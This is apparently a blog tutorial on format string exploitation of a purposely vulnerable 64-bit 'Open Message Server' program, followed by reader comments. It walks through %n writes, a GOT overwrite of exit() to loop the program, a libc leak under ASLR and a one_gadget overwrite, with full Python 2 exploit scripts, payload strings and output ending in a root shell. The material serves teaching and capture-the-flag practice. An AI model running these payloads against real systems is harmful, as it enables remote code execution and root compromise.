Format Strings: GOT overwrite to change Control Flow Remotely on ASLR
Previously we saw how we can use format strings to leak memory and return to PLT to bypass ASLR. In this article we will see what more we can do with format string exploits.
We had a format string vulnerability in the printf function, so let's head to the man page of printf.
Conversion specifiers
    A character that specifies the type of conversion to be applied.
    The conversion specifiers and their meanings are:
n      The  number  of characters written so far is stored into the integer
       pointed to by the corresponding argument.  That argument shall be an
       int *, or variant whose size matches the (optionally) supplied integer
       length modifier.  No argument is converted.  (This specifier is not
       supported by the bionic C library.)  The behavior is  undefined  if the
       conversion specification includes any flags, a field width, or a precision.
Let's take a look at this code.
Clearly at line 15, we can see a format string vulnerability. Compile it with the '-no-pie' flag. Position Independent Executable (PIE) is an exploit mitigation technique which loads the executable at a random base address, making it harder for an attacker to find the correct addresses. Addresses in such executables are calculated as offsets relative to that base. We don't want that now.
virtual@mecha:~$ gcc frmt_str.c -o frmt_str -no-pie
Format Strings: Few basics
Let's run the program we just compiled and input some format strings. 
virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 
Sent !
0x8d6260 0x7fdc0e42d720 0x7fdc0e3597a8 0x7fdc0e432500 0x77 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0xa2070252070 0x9 0xf0b5ff 0xc2 0x7ffc19269816
virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %6$p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
Sent !
0x2070252070243625 0x602260 0x7ffff7f82720 0x7ffff7eae7a8 0x7ffff7f87500 0x77 0x2070252070243625 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa702520702520 0x9 0xf0b5ff 0xc2
virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p %5$p 
Sent !
0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77 0x77
virtual@mecha:~$ ./frmt_str
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %5$p %5$100p %p %60p %p %p %p %p %p %p %p %p %p %p %p
Sent !
0x77                                               0x77 0x602260                           0x7ffff7f82720 0x7ffff7eae7a8 0x7ffff7f87500 0x77 0x2435252070243525 0x2070252070303031 0x2070252070303625 0x7025207025207025 0x2520702520702520 0x2070252070252070 0xa7025207025 0xf0b5ff
Time to test our notorious '%n' format specifier. It writes the number of bytes printed so far to the memory location its argument points to. In the above examples, if we replace a 'p' with 'n', printf will try to write the number of bytes printed on screen till then to the memory location that was printed by that particular 'p'.
Let's test that in gdb.
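Before the gdb session, one detail in the dumps above is worth checking: the 6th value, 0x7025207025207025, looks like ASCII. The sketch below is Python 3 (the article's own scripts are Python 2), and `decode_leak` and `arg_index` are illustrative helper names, not something from the program. It unpacks a printed value back into the 8 bytes it occupied in memory and, assuming every argument from the 6th onward is one 8-byte stack slot, estimates which argument number a given offset into our input corresponds to.

```python
import struct

def decode_leak(token):
    """Convert one %p output token into the 8 little-endian bytes it held in memory."""
    return struct.pack("<Q", int(token, 16))

def arg_index(buffer_start, byte_offset):
    """Argument number of the 8-byte slot at byte_offset into the input,
    assuming the input begins at argument number buffer_start."""
    return buffer_start + byte_offset // 8

# Values 5, 6 and 7 from the first dump above.
for number, token in enumerate(["0x77", "0x7025207025207025", "0x2520702520702520"], start=5):
    print(number, decode_leak(token))

# Where would data placed 24 and 32 bytes into the input show up?
print(arg_index(6, 24), arg_index(6, 32))
```

The 6th value decodes to the text `%p %p %p`, i.e. the start of our own input, which suggests that anything we append to the input can be reached with a positional specifier such as %9$p.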
virtual@mecha:~$ gdb frmt_str -q
Reading symbols from frmt_str...(no debugging symbols found)...done.
gdb-peda$ aslr off
gdb-peda$ r <<< "ABCDEFGH%p"                 <== 8 bytes then %p
Starting program: /home/archer/Documents/frmt_str <<< "ABCDEFGH%p"
########  Welcome to Open Message Server ########
Enter message(max 150 chars): Sent !
ABCDEFGH0x602260                             <== 8 bytes then an address
[Inferior 1 (process 5079) exited normally]
Warning: not running or target is remote
gdb-peda$ b *main+137
Breakpoint 1 at 0x40072b
gdb-peda$ r <<< "ABCDEFGH%n"                 <== %p replaced with %n. Number of bytes will be written at the address
Starting program: /home/archer/Documents/frmt_str <<< "ABCDEFGH%n"
########  Welcome to Open Message Server ########
Enter message(max 150 chars): Sent !
ABCDEFGH
Breakpoint 1, 0x000000000040072b in main ()
gdb-peda$ x 0x602260
0x602260: 0x4847464500000008                 <== the count 8 stored at the address as a 4-byte int ("EFGH" is still in the upper 4 bytes)
Exploiting the program
Our main concern here is that the program never returns. It exits directly. Even if we overwrite something with the format string vulnerability, we may not be able to use it. Also, ASLR will be on, so once the program exits, our memory leak won't be useful.
Top priority is to stop the program from exiting. But how? Think!
[Hint: Global Offset Table]
We learned in the last article how the Procedure Linkage Table and Global Offset Table work. Functions defined in shared libraries like libc are located with the help of the PLT and GOT. The GOT is also writable, and whenever one of these functions (like exit(), printf(), etc.) is called, the GOT entry of that function is looked up first, then the program counter jumps to the address stored there.
What if we modify the GOT entry of a function with format strings? Whenever that function is called, the program counter will go to the address in the modified GOT entry. Great. Finally we have control over the program counter.
Now, about keeping the leaks useful despite ASLR and then crafting and sending an exploit from them: it seems we need to provide input 2-3 times to the same process for it to spit out the information necessary to craft an exploit.
Best way to do that? Just don't let the program die, and make it prompt for input again. What I did was overwrite the GOT entry of the exit() function with the address of _start, so whenever exit is called, the program starts again without getting killed.
_start() from exit()
From gdb we can find address of _start function.
gdb-peda$ info functions _start 
All functions matching regular expression "_start":
Non-debugging symbols:
0x00000000004005c0  _start
To write this address with a single %n we would have to print 0x4005c0 i.e. 4,195,776 bytes. That is a lot of bytes. You can try that, but as the numbers get bigger it becomes inefficient and takes a lot of time. What else can be done?
We can divide the address into multiple parts. First we will use %p to print 0xc0 i.e. 192 bytes, followed by a %n pointing to exit@got.plt. Then for the remaining 0x4005 i.e. 16,389 part we need (16389-192=) 16197 more bytes with another %p, followed by the next %n pointing to the (exit@got.plt+1) address. Finally, the payload ends with the addresses of exit@got.plt and exit@got.plt+1 so that we can make each %n point to them.
Confusing? You will understand more in practice. Till then try playing with format strings a bit. See how changing the number of bytes in the input affects where you point to. Maybe disable ASLR for a bit.
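The arithmetic above can be written down as a short sketch. It is Python 3 (the article's own scripts are Python 2), and `two_write_payload` is a made-up helper name. The argument number 9 is an assumption taken from the payload used later in this article: the input starts at argument 6 in the dumps earlier, and a format string padded to 24 bytes occupies three 8-byte slots.

```python
import struct

def two_write_payload(target, got_addr, first_arg=9, fmt_len=24):
    """Build a payload that writes `target` to `got_addr` with two %n writes."""
    low = target & 0xff        # least significant byte, written at got_addr
    rest = target >> 8         # remaining bytes, written at got_addr + 1
    if rest <= low:
        raise ValueError("second count must be larger than the first")
    # The second pad is only the difference, since `low` bytes are already printed.
    fmt = "%{0}p%{1}$n%{2}p%{3}$n".format(low, first_arg, rest - low, first_arg + 1)
    if len(fmt) > fmt_len:
        raise ValueError("format string does not fit in fmt_len bytes")
    fmt = fmt.ljust(fmt_len)   # constant length keeps the argument numbers stable
    addrs = struct.pack("<QQ", got_addr, got_addr + 1)
    return fmt.encode("ascii") + addrs

# _start and exit@got.plt values as found for this binary in the article.
payload = two_write_payload(0x4005c0, 0x601038)
print(payload[:24])
print(payload[24:])
```

The addresses go at the end because they contain null bytes; placed at the front they would terminate the format string before printf ever reached the specifiers.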
So if you tried playing with different types and lengths of input, you will have noticed that a particular format string shows different content when the length of the input changes. No idea what I'm talking about? As we know, we can dump the contents of memory with format strings, and that includes the contents of local variables. In this program our input is stored in a local variable. When we change the length of the input, a given %p still points to the same memory location, but the contents of that location change. So while trying out different inputs, we want the format string part of our input to have a constant length, which makes it easier to find contents in memory and to debug the exploit.
I already have my program running as root on a remote server at port 5555 with this command.
$ sudo socat tcp-listen:5555,reuseaddr,fork exec:"./frmt_str"
from telnetlib import Telnet
from struct import pack
p64 = lambda x : pack("Q",x)
p=Telnet('192.168.43.81',5555)                    #remote ip and port
exit_got=0x601038                                 #address of exit@got.plt
_start=0x4005c0                   #4195776        address of _start function
buf = ""                                          #payload
buf+='%p%p%p%p'.ljust(24)                         #adjust the size of string to be always 24 bytes
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")                         #read from network
p.write(buf+'\n')                                 #write to network
p.interact()
 $ python2 tst.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
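0x746e65530x7fed84e6e8c00x2120746e0x7fed850804c0                8
The four %p print the first four arguments, and the trailing 8 is the first byte (0x38) of the exit@got.plt address appended to the payload. Our input starts at the 6th argument (see the %6$p output earlier), and the format string is padded to 24 bytes i.e. three 8-byte slots, so the two addresses should be the 9th and 10th arguments. Let's check that with %9$p and %10$p.
from telnetlib import Telnet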
from struct import pack
p64 = lambda x : pack("Q",x)
#p=process('./frmt_str')
p=Telnet('192.168.43.81',5555)
exit_got=0x601038
_start=0x4005c0                     #4195776
buf = ""
buf+='%p%9$p%p%10$p'.ljust(24)
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")
p.write(buf+'\n')
p.interact()
$ python2 tst.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
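0x746e65530x6010380x7ff78d3088c00x601039           8
%9$p and %10$p print 0x601038 and 0x601039, so the 9th and 10th arguments are the exit@got.plt and exit@got.plt+1 addresses from our payload. Now we replace those two with %n. The first %p is padded to print 0xc0 i.e. 192 bytes, and the third specifier, another %p, prints the rest: for 0x4005 i.e. 16,389 bytes we need (16389-192=) 16197 bytes more. After the payload is executed, the GOT entry of exit will point to _start of the program. New payload:
from telnetlib import Telnet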
from struct import pack
p64 = lambda x : pack("Q",x)
#p=process('./frmt_str')
p=Telnet('192.168.43.81',5555)
exit_got=0x601038
_start=0x4005c0 #4195776
buf = ""
buf+='%192p%9$n%16197p%10$n'.ljust(24)
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")
p.write(buf+'\n')
p.interact()
$ python2 tst.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
.
[redacted empty space]
.              0x746e6553
.
.
[redacted]
.
.   0x7f8f9bebf8c0   8 `########  Welcome to Open Message Server ########
Enter message(max 150 chars): %p%p%p%p%p%p
Sent !
0x746e65530x7f8f9bebf8c00x2120746e0x7f8f9c0d14c0(nil)0x7025702570257025
########  Welcome to Open Message Server ########
Enter message(max 150 chars): %p%p%p%p%p%p
Sent !
0x746e65530x7f8f9bebf8c00x2120746e0x7f8f9c0d14c0(nil)0x7025702570257025
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
And now our program restarts whenever it calls exit(), so it effectively runs in an infinite loop and we can gather more info to craft an exploit for remote code execution.
Now for RCE we'll do return to libc. First you might want to find out the version of libc on the target. The OS and version may be guessed through some reconnaissance, or through more reliable methods that we will discuss in the next article, where we will exploit a completely unknown libc.
In this program, we can dump data from the stack and check whether it contains any libc address. You might want to turn off ASLR on your test target and find the address range of libc with vmmap in gdb-peda, or use cat /proc/$pid/maps to view the memory maps.
from telnetlib import Telnet
from struct import pack
p64 = lambda x : pack("Q",x)
#p=process('./frmt_str')
p=Telnet('192.168.43.81',5555)
exit_got=0x601038
_start=0x4005c0               #4195776
buf = ""
buf+='%192p%9$n%16197p%10$n'.ljust(24)
buf+=p64(exit_got)
buf+=p64(exit_got+1)
print p.read_until("s):")
p.write(buf+'\n')
print p.read_until("s):")
buf=""
buf+="%p "*30
p.write(buf+'\n')
print p.read_until("Sent !\n")
rec = p.read_until("s):").split(' ')
print rec
print "[*] Possible libc address rec[26]:",rec[26]
$ python2 frmt_str.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
['0x746e6553', '0x7ffff7dd18c0', '0x2120746e', '0x7ffff7fde4c0', '(nil)', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x62b52fa4f00a2070', '(nil)', '0x40077d', '0x4005c0', '(nil)', '0x400730', '0x4005c0', '0x7fffffffe580', '0x62b52fa4f0c2f600', '0x400730', '0x7ffff7a05b97', '0x7fffffffe340', '0x7fffffffe400', '0x40073000000000', '\n\xf0\xa4/\xb5b########', '', 'Welcome', 'to', 'Open', 'Message', 'Server', '########\n\nEnter', 'message(max', '150', 'chars):']
[*] Possible libc address rec[26]: 0x7ffff7a05b97
Next we will search for one gadget in target libc.
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rcx == NULL
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL
0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
libc_start_main = int(rec[26],16)          #leaked libc address, presumably main's return address into __libc_start_main
libc_base_off = 0x21b97                    #offset of that address from the libc base (specific to this libc build)
one_gadget_off = 0x10a38c                  #third gadget from the one_gadget output above
libc_base = libc_start_main - libc_base_off
one_gadget = hex(libc_base + one_gadget_off)
print "[*] Found libc base:",hex(libc_base)
print "[*] One gadget location:",one_gadget
We can again use a format string to overwrite the GOT entry of a function and change it to our gadget. But we have some problems we need to solve. If you were able to follow this far, try going further and solving the problems yourself now. You might even discover some new ways. If stuck, you may read further to find out how I did it.
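Before overwriting anything, it may be worth sanity-checking the base computed by the snippet above, since a wrong libc offset silently produces a wrong gadget address. The sketch below is Python 3 with a made-up helper name (`resolve`). It reuses the two offsets from the article and adds one assumption of its own: a shared library is mapped at a page-aligned address, so the low 12 bits of a correct base should be zero.

```python
LEAK_OFF = 0x21b97          # offset of the leaked address from libc base (from the article)
ONE_GADGET_OFF = 0x10a38c   # gadget offset chosen in the article

def resolve(leak_text):
    """Return (libc_base, one_gadget_address) for a leaked pointer given as hex text."""
    leak = int(leak_text, 16)
    base = leak - LEAK_OFF
    if base & 0xfff:
        # A base that is not page aligned usually means a wrong leak or a different libc.
        raise ValueError("libc base %#x is not page aligned" % base)
    return base, base + ONE_GADGET_OFF

# rec[26] from the ASLR-off run shown earlier.
base, gadget = resolve("0x7ffff7a05b97")
print(hex(base), hex(gadget))
```

If the check raises, the likely culprits are a different libc version on the target or a leak taken from the wrong stack position.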
Since we are using a format string to overwrite the GOT entry, we need to print as many bytes as the value of the address. You will see that an address in libc is actually a very large number. To do this efficiently we can split it into 4-5 small parts. The problem is, since ASLR is on, our exploit code needs to calculate how to split the address every time. Let's see how we can do it. You can try to implement your own algorithm for it.
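One possible way to compute such a split automatically is sketched below. It is not the method this article uses next: it assumes one-byte writes with %hhn (the length-modifier variant mentioned in the man page excerpt at the top) instead of overlapping %n writes. The helper name `plan_byte_writes` and the `min_pad` default are made up for illustration; `min_pad` exists because a padded %p can never print fewer characters than the pointer text itself.

```python
def plan_byte_writes(value, nbytes=6, min_pad=20):
    """Return, for each byte of value (least significant first), how many
    characters to print before the corresponding one-byte write."""
    pads = []
    printed = 0
    for i in range(nbytes):
        wanted = (value >> (8 * i)) & 0xff
        pad = (wanted - printed) % 256   # distance to the next matching low byte
        while pad < min_pad:             # too short for a padded %p, go one lap further
            pad += 256
        pads.append(pad)
        printed += pad
    return pads

pads = plan_byte_writes(0x7f8e9def138c)
print(pads)
```

With one-byte writes nothing spills into the neighbouring bytes, at the cost of one extra specifier and one extra address per byte, which matters when the message is limited to 150 characters.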
Take this address in libc for example: 0x7f8e9def138c. I will divide the address into 5 parts and then overwrite exit@got.plt byte by byte, starting from the least significant byte, like this:
a=int(one_gadget[:6],16)         #0x7f8e
b=int('0x'+one_gadget[6:8],16)   #0x9d
c=int('0x'+one_gadget[8:10],16)  #0xef
d=int('0x'+one_gadget[10:12],16) #0x13
e=int('0x'+one_gadget[12:],16)   #0x8c
We write e (0x8c i.e. 140 bytes) first. The next byte, d, is 0x13, so we may not be able to write it directly since it's smaller than the number of bytes already printed, i.e. 140. But 0x113 (275) is more than 140. We can print 0x113 bytes in total and let the extra 0x1 spill into the following byte, which the next %n then overwrites. In other words, we overflow into the next byte and fix that byte with the next %n. This is done by adding 0x100 to the smaller value until it becomes greater than the previous one. The same overflow is used for (c,d) and (b,c) whenever the latter value is less than the total number of bytes printed so far. At last 'a' (0x7f8e) is written to the address. Here's how the payload will be.
while e>d:
    d+=0x100                #add 0x100 till d is no longer smaller than e
while d>c:
    c+=0x100
while c>b:
    b+=0x100
buf = ""                 #specify the number of bytes and point to correct address
#each count has the previous one subtracted, to account for the bytes already printed
buf+="%{0}p%13$n%{1}p%14$n%{2}p%15$n%{3}p%16$n%{4}p%17$n".format(e,d-e,c-d,b-c,a-b).ljust(56)
buf+=p64(exit_got)               # 5 addresses byte by byte
buf+=p64(exit_got+1)
buf+=p64(exit_got+2)
buf+=p64(exit_got+3)
buf+=p64(exit_got+4)
buf+=p64(0x0)*2                # just some nulls for cleaner stack
We made the final payload. Time to put everything together and test. Here's my exploit.
You might require some changes. Also, if you face problems, try troubleshooting by attaching to the process in gdb or any debugger of your choice. Check whether you are able to overwrite the address correctly.
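One way to check a split before sending it is to simulate the writes offline. The sketch below is Python 3 with made-up helper names. It repeats the splitting loops from the payload code and then applies each %n as a 4-byte little-endian store (an int, per the man page excerpt), one byte further along each time, to show how the spilled high bytes are overwritten by the next write. The starting GOT content, 0x4005c0, assumes the first stage has already redirected exit to _start.

```python
import struct

def split_like_article(address):
    """Split a 48-bit address into four single bytes (LSB first) plus the top
    two bytes, bumping each count by 0x100 until the sequence does not decrease."""
    e = address & 0xff
    d = (address >> 8) & 0xff
    c = (address >> 16) & 0xff
    b = (address >> 24) & 0xff
    a = address >> 32
    while e > d:
        d += 0x100
    while d > c:
        c += 0x100
    while c > b:
        b += 0x100
    return [e, d, c, b, a]

def simulate_n_writes(counts, entry):
    """Apply one 4-byte %n store per count at offsets 0, 1, 2, ... of the entry.
    Eight extra bytes stand in for the neighbouring GOT entry."""
    memory = bytearray(entry) + bytearray(8)
    for offset, count in enumerate(counts):
        memory[offset:offset + 4] = struct.pack("<I", count)
    return memory

target = 0x7f8e9def138c
counts = split_like_article(target)
pads = [counts[0]] + [counts[i] - counts[i - 1] for i in range(1, len(counts))]
memory = simulate_n_writes(counts, struct.pack("<Q", 0x4005c0))
print(counts, pads)
print(hex(struct.unpack("<Q", bytes(memory[:8]))[0]))
```

If two neighbouring bytes are equal the loops leave a pad of 0, and any pad shorter than the text %p prints on its own throws the running count off, so it seems sensible to check that every pad is comfortably large before sending the payload.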
Running the exploit:
attacker@server:~$ python2 frmt_str.py
########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
                                                                                                                                                                                      0x746e6553
.
[redacted]
.
0x7f293a0fd8c0   8 `########  Welcome to Open Message Server ########
Enter message(max 150 chars):
 Sent !
['0x746e6553', '0x7f293a0fd8c0', '0x2120746e', '0x7f293a30f4c0', '(nil)', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x2070252070252070', '0x7025207025207025', '0x2520702520702520', '0x27d3c871560a2070', '(nil)', '0x40077d', '0x4005c0', '(nil)', '0x400730', '0x4005c0', '0x7ffe8a45fef0', '0x27d3c87156e3a200', '0x400730', '0x7f2939d31b97', '0x7ffe8a45fcb0', '0x7ffe8a45fd70', '0x40073000000000', "\nVq\xc8\xd3'########", '', 'Welcome', 'to', 'Open', 'Message', 'Server', '########\n\nEnter', 'message(max', '150', 'chars):']
[*] Possible libc address rec[26]: 0x7f2939d31b97
[*] Found libc base: 0x7f2939d10000
[*] One gadget location: 0x7f2939e1a38c
Press Enter >
 Sent !
                                                                                                                                  0x746e6553         0x7f293a0fd8c0                                                    0x2120746e                                                                          0x7f293a30f4c0
.
[redacted]
.
.
uid=0(root) gid=0(root) groups=0(root)
root@mecha:~# whoami
whoami
root
root@mecha:~# pwd
pwd
/home/virtual
root@mecha:~#
You might have seen RELRO as an exploit mitigation technique.
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
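RELRO     : Partial
With Partial RELRO the .got.plt section stays writable, which is why the GOT overwrite above works; Full RELRO would make the GOT read-only.
In the next article we will try to exploit a completely unknown libc on a remote system with ASLR.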
For further queries contact me @ShivamShrirao.
Next read: Leak libc addresses from GOT to exploit unknown libc, bypassing ASLR remotely 64 bit

 
 
Could you help me?
When I run frmt_str.py I get disconnected immediately.
Previous pieces of Python code worked until I reached this part:
while e>d:
    d+=0x100 #add 0x100 till d becomes greater than e
while d>c:
    c+=0x100
while c>b:
    b+=0x100
buf = "" #specify the number of bytes and point to correct address
buf+="%{0}p%13$n%{1}p%14$n%{2}p%15$n%{3}p%16$n%{4}p%17$n".format(e,d-e,c-d,b-c,a-b).ljust(56)
buf+=p64(exit_got) #subtracted to reduce number of bytes already printed
buf+=p64(exit_got+1) # 5 addresses byte by byte
buf+=p64(exit_got+2)
buf+=p64(exit_got+3)
buf+=p64(exit_got+4)
buf+=p64(0x0)*2
Well, this part of the code is kinda hacky; I made it to work for me. It's simple maths to align and overwrite the target address correctly. You should probably edit it according to your address, debugging carefully so that each part of the address fits the target correctly. The first thing you should focus on is how you overwrite the GOT entry of exit and how I have divided the address so that I overwrite it and build my final address in multiple steps. Try making your own code to divide the address in steps first. You may disable ASLR; it will be easier to understand then. Then make the code figure out a way to divide any address. It may not be easy to understand at first, but do some trial and error and keep looking at the address with gdb at each step.
Btw also make sure your libc base and one gadget address are correct.
Hi Shivam,
"In next article we will try to exploit a completely unknown libc on a remote system with ASLR."
When will you publish it? =)
Really sorry it took this long to complete. I got busy with other stuff and just left it. But I am finally completing the article. It's halfway done and will be published in a day or two. Thank you.
Hey, it's published now.
I haven't come across such a great article, one that explains so many things in such a nice way, in a while. Kudos to you. I also solved a redpwnctf2020 pwn problem using two of your articles. Thanks for making my day.
Awesome. That's great to hear. Your comment made my day.
Could you use this technique to change the instruction pointer to a puts function call in the binary, and get it to print the address of puts in libc to determine the libc version? Would you have to put the GOT address at the start of the payload, so it is passed to puts as an argument (on 32 bit)? Or is there an easier way to determine the libc version using a format string vulnerability?
Yes you can, although you need to set up more of a ROP chain to fill the proper arguments in registers for puts. And for 32 bit you need to check where exactly on the stack your arguments are placed and then align them accordingly.
I have discussed a few more methods, without format strings, in this article.
https://www.ret2rop.com/2020/04/got-address-leak-exploit-unknown-libc.html
great article and thanks for sharing your knowledge